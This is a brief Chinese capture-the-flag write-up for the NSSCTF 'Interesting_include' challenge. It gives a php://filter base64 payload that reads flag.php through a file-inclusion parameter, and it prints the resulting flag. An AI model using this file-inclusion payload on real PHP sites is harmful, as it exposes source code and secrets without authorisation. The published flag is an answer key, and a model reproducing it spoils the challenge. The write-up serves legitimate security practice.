NSSCTF Interesting_include

开启环境:

NSSCTF Interesting_include_第1张图片

通过审计,我们可知:

flag在flag.php中,可以利用php中伪协议
payload:?filter=php://filter/read=convert.base64-encode/resource=flag.php 

NSSCTF Interesting_include_第2张图片

将其base64解码就是flag.

NSSCTF{3dc54721-be9e-444c-8228-7133fba76ad4} 

你可能感兴趣的:(php)